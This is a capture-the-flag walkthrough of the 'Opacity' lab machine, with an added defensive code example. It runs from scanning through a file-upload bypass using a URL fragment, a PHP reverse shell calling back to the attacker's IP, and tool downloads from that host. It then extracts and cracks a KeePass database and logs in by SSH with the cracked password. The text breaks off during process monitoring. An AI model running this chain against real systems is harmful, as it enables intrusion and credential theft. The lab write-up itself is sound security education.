Opacity

Last updated 2 years ago

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

Opacity

Opacity is an easy machine that can help you in the penetration testing learning process.

There are 2 hash keys located on the machine (user - local.txt and root - proof.txt). Can you find them and become root?

Hint: There are several ways to perform an action; always analyze the behavior of the application.

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.142.194 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.142.194:22
Open 10.10.142.194:80
Open 10.10.142.194:139
Open 10.10.142.194:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 18:49 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:49, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:49, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:49, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:49
Completed Parallel DNS resolution of 1 host. at 18:49, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:49
Scanning 10.10.142.194 [4 ports]
Discovered open port 139/tcp on 10.10.142.194
Discovered open port 445/tcp on 10.10.142.194
Discovered open port 80/tcp on 10.10.142.194
Discovered open port 22/tcp on 10.10.142.194
Completed Connect Scan at 18:49, 0.32s elapsed (4 total ports)
Initiating Service scan at 18:49
Scanning 4 services on 10.10.142.194
Completed Service scan at 18:49, 12.22s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.142.194.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:49
Completed NSE at 18:50, 10.03s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 1.53s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Nmap scan report for 10.10.142.194
Host is up, received user-set (0.32s latency).
Scanned at 2023-04-09 18:49:40 EDT for 25s

PORT    STATE SERVICE     REASON  VERSION
22/tcp  open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
|   256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqe7rEbmvlsedJwYaZCIdligUJewXWs8mOjEKjVrrY/28XqW/RMZ12+4wJRL3mTaVJ/ftI6Tu9uMbgHs21itQQ=
|   256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINQSFcnxA8EchrkX6O0RPMOjIUZyyyQT9fM4z4DdCZyA
80/tcp  open  http        syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
139/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open  netbios-ssn syn-ack Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   OPACITY<00>          Flags: <unique><active>
|   OPACITY<03>          Flags: <unique><active>
|   OPACITY<20>          Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| smb2-time: 
|   date: 2023-04-09T22:49:54
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 31044/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 35765/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 56906/udp): CLEAN (Failed to receive data)
|   Check 4 (port 4711/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:50
Completed NSE at 18:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.73 seconds

┌──(witty㉿kali)-[~/Downloads]
└─$ gobuster -t 64 dir -e -k -u http://10.10.142.194 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.142.194
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2023/04/09 19:15:25 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.142.194/css                  (Status: 301) [Size: 312] [--> http://10.10.142.194/css/]
http://10.10.142.194/cloud                (Status: 301) [Size: 314] [--> http://10.10.142.194/cloud/]
http://10.10.142.194/server-status        (Status: 403) [Size: 278]
Progress: 181040 / 220561 (82.08%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/04/09 19:25:05 Finished
===============================================================

┌──(witty㉿kali)-[~/Downloads]
└─$ smbmap -u anonymous -H 10.10.142.194
[+] Guest session   	IP: 10.10.142.194:445	Name: 10.10.142.194                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	IPC$                                              	NO ACCESS	IPC Service (opacity server (Samba, Ubuntu))
                                                                                  
┌──(witty㉿kali)-[~/Downloads]
└─$ enum4linux -a 10.10.142.194               
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr  9 19:03:57 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.142.194
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.10.142.194 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 10.10.142.194 )===============================

Looking up status of 10.10.142.194
	OPACITY         <00> -         B <ACTIVE>  Workstation Service
	OPACITY         <03> -         B <ACTIVE>  Messenger Service
	OPACITY         <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================( Session Check on 10.10.142.194 )===================================


[+] Server 10.10.142.194 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.142.194 )================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ==================================( OS information on 10.10.142.194 )==================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.142.194 from srvinfo: 
	OPACITY        Wk Sv PrQ Unx NT SNT opacity server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03


 =======================================( Users on 10.10.142.194 )=======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 =================================( Share Enumeration on 10.10.142.194 )=================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (opacity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.142.194

//10.10.142.194/print$	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.142.194/IPC$	Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 10.10.142.194 )===========================



[+] Attaching to 10.10.142.194 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] OPACITY
	[+] Builtin

[+] Password Info for Domain: OPACITY

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 ======================================( Groups on 10.10.142.194 )======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ==================( Users on 10.10.142.194 via RID cycling (RIDS: 500-550,1000-1050) )==================


[I] Found new SID: 
S-1-22-1

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\sysadmin (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-1327801453-43412457-3647261475 and logon username '', password ''

S-1-5-21-1327801453-43412457-3647261475-501 OPACITY\nobody (Local User)
S-1-5-21-1327801453-43412457-3647261475-513 OPACITY\None (Domain Group)

 ===============================( Getting printer info for 10.10.142.194 )===============================

No printers returned.


enum4linux complete on Sun Apr  9 19:19:44 2023

┌──(witty㉿kali)-[~/Downloads]
└─$ file filekoth                   
filekoth: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1350x900, components 3


┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234                                       
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...

Request:
POST /cloud/ HTTP/1.1
Host: 10.10.142.194
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Origin: http://10.10.142.194
Connection: close
Referer: http://10.10.142.194/cloud/
Cookie: PHPSESSID=.....
Upgrade-Insecure-Requests: 1

url=http%3A%2F%2F10.8.19.103%3A1234%2Ffilekoth

Response: 
HTTP/1.1 200 OK

Reverse shell:

┌──(witty㉿kali)-[~/Downloads]
└─$ tail payload_ivan.php
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('10.8.19.103', 1337);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?> 

http://10.8.19.103:1234/payload_ivan.php#filehoth.jpg
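
Added example (not part of the original writeup or of the room's code): the URL above ends in `.jpg` only in its fragment, which an HTTP client never sends to the server it fetches from. The Python sketch below contrasts an assumed suffix-only check with a check on the parsed path plus the file's magic bytes. The page does not show the application's real check, so `naive_check` is an assumption, as are all function names and the constructed sample bodies.

```python
import hashlib
import posixpath
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Leading bytes ("magic numbers") of the image formats the uploader accepts.
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def naive_check(url: str) -> bool:
    """Assumed weak check: only looks at how the raw string ends."""
    return url.lower().endswith(tuple(MAGIC))


def path_extension(url: str) -> str:
    """Extension of the path that is actually requested.

    The query (?...) and fragment (#...) are split off first, so text
    placed there cannot change the result.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError("unsupported scheme or missing host")
    return posixpath.splitext(parts.path)[1].lower()


def strict_check(url: str, body: bytes) -> tuple[bool, str]:
    """Accept only if the path extension AND the content agree on an image type."""
    try:
        ext = path_extension(url)
    except ValueError as exc:
        return False, str(exc)
    if ext not in MAGIC:
        return False, f"path extension {ext!r} not allowed"
    if not body.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


def stored_name(body: bytes, ext: str) -> str:
    """Server-chosen file name, so nothing from the URL reaches the file system."""
    return hashlib.sha256(body).hexdigest()[:32] + ext


# URL taken from the page; the bodies are constructed sample data.
BYPASS_URL = "http://10.8.19.103:1234/payload_ivan.php#filehoth.jpg"
PHP_BODY = b"<?php /* constructed placeholder */ ?>"
JPEG_BODY = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16

if __name__ == "__main__":
    cases = [
        (BYPASS_URL, PHP_BODY),
        ("http://10.8.19.103:1234/photo.jpg", PHP_BODY),
        ("http://10.8.19.103:1234/photo.jpg", JPEG_BODY),
    ]
    for url, body in cases:
        print(f"{url}\n  naive={naive_check(url)} strict={strict_check(url, body)}")
```

The shell later in this writeup starts in `/var/www/html/cloud/images`, so the upload directory also executed PHP; serving that directory as static files only is the second control next to the validation above.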

┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.142.194] 39452
SOCKET: Shell has connected! PID: 2880
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@opacity:/var/www/html/cloud/images$ ls
ls
www-data@opacity:/var/www/html/cloud/images$ cd ..
cd ..
www-data@opacity:/var/www/html/cloud$ ls
ls
folder.png  images  index.php  load.gif  storage.php  style.css
www-data@opacity:/var/www/html/cloud$ cd ..
cd ..
www-data@opacity:/var/www/html$ ls
ls
cloud  css  index.php  login.php  logout.php
www-data@opacity:/var/www/html$ cat login.php
cat login.php
<?php session_start(); /* Starts the session */
	
	/* Check Login form submitted */	
	if(isset($_POST['Submit'])){
		/* Define username and associated password array */
		$logins = array('admin' => 'oncloud9','root' => 'oncloud9','administrator' => 'oncloud9');
		
		/* Check and assign submitted Username and Password to new variable */
		$Username = isset($_POST['Username']) ? $_POST['Username'] : '';
		$Password = isset($_POST['Password']) ? $_POST['Password'] : '';
		
		/* Check Username and Password existence in defined array */		
		if (isset($logins[$Username]) && $logins[$Username] == $Password){
			/* Success: Set session variables and redirect to Protected page  */
			$_SESSION['UserData']['Username']=$logins[$Username];
			header("location:index.php");
			exit;
		} else {
			/*Unsuccessful attempt: Set error message */
			$msg="<span style='color:red'>Invalid Login Details</span>";
		}
	}
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Login</title>
<link href="./css/style.css" rel="stylesheet">
</head>
<body>


  

<br>
<form align="center" action="" method="post" name="Login_Form">
  <table width="400" border="0" align="center" cellpadding="5" cellspacing="1" class="Table">
    <?php if(isset($msg)){?>
    <tr>
      <td colspan="2" align="center" valign="top"><?php echo $msg;?></td>
    </tr>
    <?php } ?>
    <tr>
      <td colspan="2" align="left" valign="top"><h3>Login</h3></td>
    </tr>
    <tr>
      <td align="right" valign="top">Username</td>
      <td><input name="Username" type="text" class="Input"></td>
    </tr>
    <tr>
      <td align="right">Password</td>
      <td><input name="Password" type="password" class="Input"></td>
    </tr>
    <tr>
      <td>&nbsp;</td>
      <td><input name="Submit" type="submit" value="Login" class="Button3"></td>
    </tr>
  </table>
</form>
</body>
</html>

administrator:oncloud9

www-data@opacity:/var$ cd backups
cd backups
www-data@opacity:/var/backups$ ls
ls
apt.extended_states.0  apt.extended_states.1.gz  backup.zip
www-data@opacity:/var/backups$ unzip backup.zip
unzip backup.zip
Archive:  backup.zip
checkdir error:  cannot create lib
                 Permission denied
                 unable to process lib/.
error:  cannot create script.php
        Permission denied

www-data@opacity:/home/sysadmin/scripts/lib$ cat backup.inc.php
cat backup.inc.php
<?php


ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');


function zipData($source, $destination) {
	if (extension_loaded('zip')) {
		if (file_exists($source)) {
			$zip = new ZipArchive();
			if ($zip->open($destination, ZIPARCHIVE::CREATE)) {
				$source = realpath($source);
				if (is_dir($source)) {
					$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
					foreach ($files as $file) {
						$file = realpath($file);
						if (is_dir($file)) {
							$zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
						} else if (is_file($file)) {
							$zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
						}
					}
				} else if (is_file($source)) {
					$zip->addFromString(basename($source), file_get_contents($source));
				}
			}
			return $zip->close();
		}
	}
	return false;
}
?>

uhmm

Uploading linpeas.sh:

www-data@opacity:/opt$ cd /tmp
cd /tmp
www-data@opacity:/tmp$ wget http://10.8.19.103:1234/linpeas.sh
wget http://10.8.19.103:1234/linpeas.sh
--2023-04-09 23:49:54--  http://10.8.19.103:1234/linpeas.sh
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828098 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 808.69K   374KB/s    in 2.2s    

2023-04-09 23:49:57 (374 KB/s) - ‘linpeas.sh’ saved [828098/828098]

www-data@opacity:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@opacity:/tmp$ ./linpeas.sh
./linpeas.sh


    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------| 
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |
    |         Follow on Twitter         :     @carlospolopm                           |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          linpeas-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...


╔══════════╣ Analyzing Keepass Files (limit 70)
-rwxrwxr-x 1 sysadmin sysadmin 1566 Jul  8  2022 /opt/dataset.kdbx

www-data@opacity:/tmp$ cd /opt
cd /opt
www-data@opacity:/opt$ ls
ls
dataset.kdbx
www-data@opacity:/opt$ file dataset.kdbx
file dataset.kdbx
dataset.kdbx: Keepass password database 2.x KDBX

www-data@opacity:/opt$ python3 -m http.server 
python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.8.19.103 - - [10/Apr/2023 00:16:32] "GET /dataset.kdbx HTTP/1.1" 200 -


┌──(witty㉿kali)-[~/Downloads]
└─$ wget http://10.10.142.194:8000/dataset.kdbx
--2023-04-09 20:16:31--  http://10.10.142.194:8000/dataset.kdbx
Connecting to 10.10.142.194:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566 (1.5K) [application/octet-stream]
Saving to: ‘dataset.kdbx’

dataset.kdbx         100%[====================>]   1.53K  --.-KB/s    in 0s      

2023-04-09 20:16:32 (20.9 MB/s) - ‘dataset.kdbx’ saved [1566/1566]

https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/

┌──(witty㉿kali)-[~/Downloads]
└─$ keepass2john dataset.kdbx > hash_opacity

┌──(witty㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_opacity 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963        (dataset)     
1g 0:00:00:18 DONE (2023-04-09 20:18) 0.05491g/s 48.32p/s 48.32c/s 48.32C/s chichi..david1
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(witty㉿kali)-[~/Downloads]
└─$ sudo apt -y install keepassx

Open the database, enter the password, then unlock it.

sysadmin:Cl0udP4ss40p4city#8700

┌──(witty㉿kali)-[~/Downloads]
└─$ ssh sysadmin@10.10.142.194
The authenticity of host '10.10.142.194 (10.10.142.194)' can't be established.
ED25519 key fingerprint is SHA256:VdW4fa9h5tyPlpiJ8i9kyr+MCvLbz7p4RgOGPbWM7Nw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.142.194' (ED25519) to the list of known hosts.
sysadmin@10.10.142.194's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 10 Apr 2023 12:26:00 AM UTC

  System load:  0.54              Processes:             129
  Usage of /:   57.5% of 8.87GB   Users logged in:       0
  Memory usage: 45%               IPv4 address for eth0: 10.10.142.194
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Feb 22 08:13:43 2023 from 10.0.2.15
sysadmin@opacity:~$ pwd
/home/sysadmin
sysadmin@opacity:~$ ls
local.txt  scripts
sysadmin@opacity:~$ cat local.txt
6661b61b44d234d230d06bf5b3c075e2

sysadmin@opacity:/tmp$ wget http://10.8.19.103:1234/pspy64
--2023-04-10 00:28:51--  http://10.8.19.103:1234/pspy64
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64               100%[====================>]   2.96M  1.12MB/s    in 2.6s    

2023-04-10 00:28:54 (1.12 MB/s) - ‘pspy64’ saved [3104768/3104768]

sysadmin@opacity:/tmp$ chmod +x pspy64
sysadmin@opacity:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/04/10 00:29:16 CMD: UID=1000  PID=27648  | ./pspy64 
2023/04/10 00:29:16 CMD: UID=0     PID=27647  | 
2023/04/10 00:29:16 CMD: UID=0     PID=27646  | 
2023/04/10 00:29:16 CMD: UID=1000  PID=27610  | -bash 
2023/04/10 00:29:16 CMD: UID=1000  PID=27609  | sshd: sysadmin@pts/1 
2023/04/10 00:29:16 CMD: UID=1000  PID=27477  | (sd-pam) 
2023/04/10 00:29:16 CMD: UID=0     PID=27476  | 
2023/04/10 00:29:16 CMD: UID=1000  PID=27475  | /lib/systemd/systemd --user 
2023/04/10 00:29:16 CMD: UID=0     PID=27462  | sshd: sysadmin [priv] 
2023/04/10 00:29:16 CMD: UID=33    PID=27420  | python3 -m http.server 
2023/04/10 00:29:16 CMD: UID=0     PID=27409  | 
2023/04/10 00:29:16 CMD: UID=0     PID=26946  | 
2023/04/10 00:29:16 CMD: UID=0     PID=26444  | 
2023/04/10 00:29:16 CMD: UID=33    PID=13311  | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=33    PID=13310  | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=33    PID=13309  | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=33    PID=13305  | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=33    PID=13304  | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=33    PID=2886   | /bin/bash 
2023/04/10 00:29:16 CMD: UID=33    PID=2885   | python3 -c import pty;pty.spawn("/bin/bash") 
2023/04/10 00:29:16 CMD: UID=33    PID=2881   | sh 
2023/04/10 00:29:16 CMD: UID=33    PID=2880   | sh -c sh 
2023/04/10 00:29:16 CMD: UID=0     PID=2725   | 
2023/04/10 00:29:16 CMD: UID=33    PID=2291   | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=0     PID=890    | /usr/sbin/smbd --foreground --no-process-group 
2023/04/10 00:29:16 CMD: UID=0     PID=877    | /usr/sbin/smbd --foreground --no-process-group 
2023/04/10 00:29:16 CMD: UID=0     PID=876    | /usr/sbin/smbd --foreground --no-process-group 
2023/04/10 00:29:16 CMD: UID=0     PID=807    | /usr/sbin/smbd --foreground --no-process-group 
2023/04/10 00:29:16 CMD: UID=33    PID=801    | php-fpm: pool www                                                             
2023/04/10 00:29:16 CMD: UID=33    PID=800    | php-fpm: pool www                                                             
2023/04/10 00:29:16 CMD: UID=0     PID=760    | /usr/sbin/apache2 -k start 
2023/04/10 00:29:16 CMD: UID=0     PID=744    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal 
2023/04/10 00:29:16 CMD: UID=0     PID=723    | /usr/sbin/ModemManager 
2023/04/10 00:29:16 CMD: UID=0     PID=678    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2023/04/10 00:29:16 CMD: UID=0     PID=639    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/04/10 00:29:16 CMD: UID=0     PID=637    | /sbin/agetty -o -p -- \u --keep-baud 115200,38400,9600 ttyS0 vt220 
2023/04/10 00:29:16 CMD: UID=1     PID=629    | /usr/sbin/atd -f 
2023/04/10 00:29:16 CMD: UID=0     PID=626    | /usr/lib/udisks2/udisksd 
2023/04/10 00:29:16 CMD: UID=0     PID=621    | /lib/systemd/systemd-logind 
2023/04/10 00:29:16 CMD: UID=0     PID=619    | /usr/lib/snapd/snapd 
2023/04/10 00:29:16 CMD: UID=104   PID=617    | /usr/sbin/rsyslogd -n -iNONE 
2023/04/10 00:29:16 CMD: UID=0     PID=614    | /usr/lib/policykit-1/polkitd --no-debug 
2023/04/10 00:29:16 CMD: UID=0     PID=612    | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)                       
